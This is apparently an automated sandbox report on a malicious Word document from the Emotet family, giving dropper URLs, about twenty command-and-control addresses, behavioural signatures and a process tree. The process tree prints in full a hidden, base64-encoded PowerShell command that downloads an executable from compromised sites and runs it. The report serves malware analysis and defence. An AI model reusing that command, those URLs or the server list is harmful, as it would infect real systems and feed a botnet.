Analysis

  • max time kernel
    29s
  • resource
    win10v191014
  • submitted
    18/12/2019, 18:29

General

  • Target

    44abe729410d044a2cef2aaa8082e26a3fc1c5b6d3c143279e02a0cd41877394

  • Sample

    191218-n6ns3fr5gx

  • SHA256

    44abe729410d044a2cef2aaa8082e26a3fc1c5b6d3c143279e02a0cd41877394

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://silverswiss.com/wp-includes/t5gp93/

exe.dropper

http://golford.com/wp-includes/nhens61255/

exe.dropper

https://limraitech.com/wp/2uknv7403/

exe.dropper

http://wdbusinessconsultant.com/wp-includes/uzse8/

exe.dropper

https://traceidentified.com/ranchLib/g5ynhrm62391/

Extracted

Family

emotet

C2

63.248.198.8:80

189.19.81.181:443

130.204.247.253:80

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

51.255.165.160:8080

118.36.70.245:80

190.210.184.138:995

188.135.15.49:80

139.162.118.88:8080

72.29.55.174:80

68.183.170.114:8080

181.231.62.54:80

192.241.146.84:8080

71.76.45.83:443

63.246.252.234:80

37.211.49.127:80

74.59.187.94:80

5.88.27.67:8080

rsa_pubkey.plain

Signatures

  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\44abe729410d044a2cef2aaa8082e26a3fc1c5b6d3c143279e02a0cd41877394.doc" /o ""
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:4960
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABVAHEAbgB0AGMAdQBxAGgAaQByAGMAZwA9ACcAWgB5AG8AbABsAHQAZQB6AGUAaAB3ACcAOwAkAFUAYQB6AG0AdgBzAHAAeQBnAHIAZABqACAAPQAgACcAMQA0ADUAJwA7ACQAWABvAG4AbQBtAHMAaQB4AD0AJwBBAGMAYwBuAHMAaQBrAG8AbQB4AHkAaQAnADsAJABCAGQAZwBxAHcAegBrAGMAbwBqAGwAZAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQBhAHoAbQB2AHMAcAB5AGcAcgBkAGoAKwAnAC4AZQB4AGUAJwA7ACQAWAB0AG4AdQBsAGYAdwB5AHMAbwBqAHQAPQAnAFQAbgBqAGMAYwB2AGsAagByAHIAZwAnADsAJABBAGkAaQBtAG8AcgBzAHMAegBxAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBCAEMATABpAGUATgBUADsAJABHAGsAeQBtAHIAbABvAGkAeQBmAHEAdAA9ACcAaAB0AHQAcABzADoALwAvAHMAaQBsAHYAZQByAHMAdwBpAHMAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdAA1AGcAcAA5ADMALwAqAGgAdAB0AHAAOgAvAC8AZwBvAGwAZgBvAHIAZAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbgBoAGUAbgBzADYAMQAyADUANQAvACoAaAB0AHQAcABzADoALwAvAGwAaQBtAHIAYQBpAHQAZQBjAGgALgBjAG8AbQAvAHcAcAAvADIAdQBrAG4AdgA3ADQAMAAzAC8AKgBoAHQAdABwADoALwAvAHcAZABiAHUAcwBpAG4AZQBzAHMAYwBvAG4AcwB1AGwAdABhAG4AdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdQB6AHMAZQA4AC8AKgBoAHQAdABwAHMAOgAvAC8AdAByAGEAYwBlAGkAZABlAG4AdABpAGYAaQBlAGQALgBjAG8AbQAvAHIAYQBuAGMAaABMAGkAYgAvAGcANQB5AG4AaAByAG0ANgAyADMAOQAxAC8AJwAuACIAcwBgAFAAbABpAFQAIgAoACcAKgAnACkAOwAkAEgAcgBlAGQAbwBsAHUAbwBzAGYAbgBsAHEAPQAnAEoAbgBkAHoAZAB1AHYAeQAnADsAZgBvAHIAZQBhAGMAaAAoACQAWgBvAGoAbQB6AGEAZQB0AHIAIABpAG4AIAAkAEcAawB5AG0AcgBsAG8AaQB5AGYAcQB0ACkAewB0AHIAeQB7ACQAQQBpAGkAbQBvAHIAcwBzAHoAcQAuACIARABgAE8AVwBuAGwAbwBBAGQARgBgAGkATABlACIAKAAkAFoAbwBqAG0AegBhAGUAdAByACwAIAAkAEIAZABnAHEAdwB6AGsAYwBvAGoAbABkACkAOwAkAEcAaABoAG8AYgB2AG8AcABpAHAAaABvAGsAPQAnAEoAYQBhAGkAdgBxAG0AegBqACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQgBkAGcAcQB3AHoAawBjAG8AagBsAGQAKQAuACIATABFAGAATgBgAGcAdABoACIAIAAtAGcAZQAgADMAOQA3ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAQQBgAFIAdAAiACgAJABCAGQAZwBxAHcAegBrAGMAbwBqAGwAZAApADsAJABIAHMAYwBtAHMAcABnAGkAZABuAGEAPQAnAFoAdwBoAGcAdQB2AGQAaQBxAHUAJwA7AGIAcgBlAGEAawA7ACQAUQB0AGcAdQBoAHkAbwB5AGgAaAB3AGcAPQAnAFkAZABtAGUAdwBhAGoAeQB3AHQAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGEAZwBxAHkAagBzAGIAdwBhAG8APQAnAEwAcwBjAHMAYQBiAGQAZgB3AHoAdgAnAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3132
    • C:\Users\Admin\145.exe
      "C:\Users\Admin\145.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4404
      • C:\Users\Admin\145.exe
        --9ae09e10
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:3896

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3896-11-0x00000000007D0000-0x00000000007E7000-memory.dmp

    Filesize

    92KB

  • memory/3896-12-0x0000000000400000-0x00000000004C1000-memory.dmp

    Filesize

    772KB

  • memory/4404-9-0x00000000022C0000-0x00000000022D7000-memory.dmp

    Filesize

    92KB